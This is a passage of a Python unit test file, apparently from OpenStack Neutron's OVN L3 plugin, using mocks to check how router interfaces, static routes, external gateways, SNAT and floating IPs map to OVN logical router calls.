'mac_address': 'aa:aa:aa:aa:aa:aa',
'network_id': 'network-id1'}
fake_rtr_intf_networks = ['2001:db8::1/24', '2001:dba::1/24']
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
called_args_dict = (
self.l3_inst._ovn.update_lrouter_port.call_args_list[0][1])
self.assertEqual(1, self.l3_inst._ovn.update_lrouter_port.call_count)
        self.assertCountEqual(fake_rtr_intf_networks,
                              called_args_dict.get('networks', []))
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
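    # Removing a router interface should delete the logical router port
    # even when the Neutron port is already gone.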
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_remove_router_interface(self, getp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
getp.side_effect = n_exc.PortNotFound(port_id='router-port-id')
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.lrp_del.assert_called_once_with(
'lrp-router-port-id', 'neutron-router-id', if_exists=True)
self.del_rev_p.assert_called_once_with(
self.context, 'router-port-id', ovn_const.TYPE_ROUTER_PORTS)
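    # If the Neutron port still exists, removing the interface updates
    # the logical router port with the remaining networks instead of
    # deleting it.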
def test_remove_router_interface_update_lrouter_port(self):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.update_lrouter_port.assert_called_once_with(
if_exists=False, name='lrp-router-port-id',
ipv6_ra_configs={},
networks=['10.0.0.100/24'],
options={},
external_ids={
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])})
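    # Router updates: changes to admin_state_up and name map to the
    # "enabled" flag and external_ids of the OVN logical router.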
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb'
'.ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_admin_state_change(self, get_rps, get_r, func):
router_id = 'router-id'
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'admin_state_up': True}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.update_lrouter.assert_called_once_with(
'neutron-router-id', enabled=True, external_ids={
ovn_const.OVN_GW_PORT_EXT_ID_KEY: '',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'router'})
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_name_change(self, get_rps, get_r, func):
router_id = 'router-id'
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'name': 'test'}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.update_lrouter.assert_called_once_with(
'neutron-router-id', enabled=False,
external_ids={ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'test',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_GW_PORT_EXT_ID_KEY: ''})
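    # Static route handling: only the delta between the old and the new
    # route list should be applied to OVN.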
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb'
'.ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_no_change(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
update_data = {'router': {'routes': [{'destination': '1.1.1.0/24',
'nexthop': '10.0.0.2'}]}}
self.l3_inst.update_router(self.context, router_id, update_data)
self.assertFalse(self.l3_inst._ovn.add_static_route.called)
self.assertFalse(self.l3_inst._ovn.delete_static_route.called)
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_change(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'routes': [{'destination': '2.2.2.0/24',
'nexthop': '10.0.0.3'}]}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='2.2.2.0/24', nexthop='10.0.0.3')
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='1.1.1.0/24', nexthop='10.0.0.2')
@mock.patch.object(utils, 'get_lrouter_non_gw_routes')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_update_router_static_route_clear(self, get_rps, get_r, func,
mock_routes):
router_id = 'router-id'
get_rps.return_value = [{'device_id': '',
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}]
mock_routes.return_value = self.fake_router['routes']
get_r.return_value = self.fake_router
new_router = self.fake_router.copy()
updated_data = {'routes': []}
new_router.update(updated_data)
func.return_value = new_router
self.l3_inst.update_router(self.context, router_id,
{'router': updated_data})
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-router-id',
ip_prefix='1.1.1.0/24', nexthop='10.0.0.2')
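    # Creating a router with an external gateway should create the OVN
    # logical router, the gateway port, a default static route and bump
    # the revision numbers of both the port and the router.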
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
def test_create_router_with_ext_gw(self, get_rps, get_subnet, get_port):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
get_subnet.return_value = self.fake_ext_subnet
get_port.return_value = self.fake_ext_gw_port
get_rps.return_value = self.fake_ext_subnet['cidr']
self.l3_inst.create_router(self.context, router)
external_ids = {ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: 'router',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_GW_PORT_EXT_ID_KEY: 'gw-port-id'}
self.l3_inst._ovn.create_lrouter.assert_called_once_with(
'neutron-router-id', external_ids=external_ids,
enabled=True, options={})
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
expected_calls = [
mock.call('neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={
ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})]
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_has_calls(expected_calls)
bump_rev_calls = [mock.call(self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS),
mock.call(self.admin_context,
self.fake_router_with_ext_gw,
ovn_const.TYPE_ROUTERS),
]
self.assertEqual(len(bump_rev_calls), self.bump_rev_p.call_count)
self.bump_rev_p.assert_has_calls(bump_rev_calls, any_order=False)
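    # Deleting a router with an external gateway simply removes the
    # whole OVN logical router.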
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
def test_delete_router_with_ext_gw(self, gs, gr, gprs):
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_ext_subnet
self.l3_inst.delete_router(self.context, 'router-id')
self.l3_inst._ovn.delete_lrouter.assert_called_once_with(
'neutron-router-id')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_with_gateway_set(self, ari, gr, grps,
gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
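    # With SNAT disabled on the gateway, adding an interface must not
    # create any NAT rule.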
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_with_gateway_set_and_snat_disabled(
self, ari, gr, grps, gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gr.return_value['external_gateway_info']['enable_snat'] = False
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_vlan_network(self, ari, gr, grps, gs,
gp, gn):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.return_value = self.fake_router_port
        # Set the network type to VLAN. Copy the fixture so the shared
        # self.fake_network dict is not mutated for later assertions.
        fake_network_vlan = copy.deepcopy(self.fake_network)
        fake_network_vlan[pnet.NETWORK_TYPE] = constants.TYPE_VLAN
gn.return_value = fake_network_vlan
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
        # Make sure that the "reside-on-redirect-chassis" option was
        # set on the new router port
fake_router_port_assert = self.fake_router_port_assert
fake_router_port_assert['options'] = {
'reside-on-redirect-chassis': 'true'}
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
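    # Removing an interface from a router with a gateway should also
    # delete the SNAT rule for the subnet.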
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_remove_router_interface_with_gateway_set(self, gr, gs, gp):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id',
'subnet_id': 'subnet-id'}
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gp.side_effect = n_exc.PortNotFound(port_id='router-port-id')
self.l3_inst.remove_router_interface(
self.context, router_id, interface_info)
self.l3_inst._ovn.lrp_del.assert_called_once_with(
'lrp-router-port-id', 'neutron-router-id', if_exists=True)
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.del_rev_p.assert_called_with(
self.context, 'router-port-id', ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_with_ext_gw(self, gr, ur, gs, grps, gp):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_without_ext_gw
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'},
nexthop='192.168.1.254')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat',
logical_ip='10.0.0.0/24', external_ip='192.168.1.1')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS)
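    # Moving the gateway to a different subnet should delete the old
    # gateway resources and recreate them for the new subnet.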
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_change_subnet(self, gr, ur, gs,
grps, gp, mock_get_gw):
self.l3_inst._ovn.is_col_present.return_value = True
mock_get_gw.return_value = [mock.sentinel.GwRoute]
router = {'router': {'name': 'router'}}
fake_old_ext_subnet = {'id': 'old-ext-subnet-id',
'ip_version': 4,
'cidr': '192.168.2.0/24',
'gateway_ip': '192.168.2.254'}
# Old gateway info with same network and different subnet
gr.return_value = copy.copy(self.fake_router_with_ext_gw)
gr.return_value['external_gateway_info'] = {
'network_id': 'ext-network-id',
'external_fixed_ips': [{'ip_address': '192.168.2.1',
'subnet_id': 'old-ext-subnet-id'}]}
gr.return_value['gw_port_id'] = 'old-gw-port-id'
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet,
'old-ext-subnet-id': fake_old_ext_subnet}.get(sid,
self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
# Check deleting old router gateway
self.l3_inst._ovn.delete_lrouter_ext_gw.assert_called_once_with(
'neutron-router-id')
# Check adding new router gateway
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_ext_gw_port,
ovn_const.TYPE_ROUTER_PORTS)
self.del_rev_p.assert_called_once_with(
self.admin_context, 'old-gw-port-id', ovn_const.TYPE_ROUTER_PORTS)
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_change_ip_address(self, gr, ur, gs,
grps, gp, mock_get_gw):
self.l3_inst._ovn.is_col_present.return_value = True
mock_get_gw.return_value = [mock.sentinel.GwRoute]
router = {'router': {'name': 'router'}}
# Old gateway info with same subnet and different ip address
gr_value = copy.deepcopy(self.fake_router_with_ext_gw)
gr_value['external_gateway_info'][
'external_fixed_ips'][0]['ip_address'] = '192.168.1.2'
gr_value['gw_port_id'] = 'old-gw-port-id'
gr.return_value = gr_value
ur.return_value = self.fake_router_with_ext_gw
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
# Check deleting old router gateway
self.l3_inst._ovn.delete_lrouter_ext_gw.assert_called_once_with(
'neutron-router-id')
# Check adding new router gateway
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_ext_gw_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'gw-port-id', 'lrp-gw-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
nexthop='192.168.1.254',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'})
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
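    # If the gateway information did not change, no OVN gateway
    # resources should be touched.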
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_v4_network_of_all_router_ports')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_ext_gw_no_change(self, gr, ur, get_rps):
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_with_ext_gw
ur.return_value = self.fake_router_with_ext_gw
self.l3_inst._ovn.get_lrouter.return_value = (
fake_resources.FakeOVNRouter.from_neutron_router(
self.fake_router_with_ext_gw))
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.lrp_del.assert_not_called()
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
self.l3_inst._ovn.add_lrouter_port.assert_not_called()
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.assert_not_called()
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_v4_network_of_all_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_update_router_with_ext_gw_and_disabled_snat(self, gr, ur,
gs, grps, gp):
self.l3_inst._ovn.is_col_present.return_value = True
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_without_ext_gw
ur.return_value = self.fake_router_with_ext_gw
ur.return_value['external_gateway_info']['enable_snat'] = False
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
        # No need to check the LSP and LRP calls here; they are covered
        # by the other test cases
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-router-id', ip_prefix='0.0.0.0/0',
external_ids={ovn_const.OVN_ROUTER_IS_EXT_GW: 'true',
ovn_const.OVN_SUBNET_EXT_ID_KEY: 'ext-subnet-id'},
nexthop='192.168.1.254')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_enable_snat(self, gr, ur, gs, grps, gp):
router = {'router': {'name': 'router'}}
gr.return_value = copy.deepcopy(self.fake_router_with_ext_gw)
gr.return_value['external_gateway_info']['enable_snat'] = False
ur.return_value = self.fake_router_with_ext_gw
self.l3_inst._ovn.get_lrouter.return_value = (
fake_resources.FakeOVNRouter.from_neutron_router(
self.fake_router_with_ext_gw))
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
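    # Disabling SNAT should only remove the existing SNAT rule; the
    # gateway static route must stay in place.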
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._check_external_ips_changed')
@mock.patch.object(utils, 'get_lrouter_snats')
@mock.patch.object(utils, 'get_lrouter_ext_gw_static_route')
@mock.patch('neutron.common.ovn.utils.is_snat_enabled',
mock.Mock(return_value=True))
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_router_ports')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
def test_disable_snat(self, gr, ur, gs, grps, gp, mock_get_gw, mock_snats,
mock_ext_ips):
mock_get_gw.return_value = [mock.sentinel.GwRoute]
mock_snats.return_value = [mock.sentinel.NAT]
mock_ext_ips.return_value = False
router = {'router': {'name': 'router'}}
gr.return_value = self.fake_router_with_ext_gw
ur.return_value = copy.deepcopy(self.fake_router_with_ext_gw)
ur.return_value['external_gateway_info']['enable_snat'] = False
gs.side_effect = lambda ctx, sid: {
'ext-subnet-id': self.fake_ext_subnet}.get(sid, self.fake_subnet)
gp.return_value = self.fake_ext_gw_port
grps.return_value = self.fake_router_ports
self.l3_inst.update_router(self.context, 'router-id', router)
self.l3_inst._ovn.delete_static_route.assert_not_called()
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='snat', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1')
self.l3_inst._ovn.add_static_route.assert_not_called()
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_not_called()
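    # Floating IPs map to dnat_and_snat NAT rules on the logical
    # router; the FIP port itself is removed from the logical switch.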
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_distributed(self, gf, gp):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gp.return_value = {'mac_address': '00:01:02:03:04:05',
'network_id': 'port-network-id'}
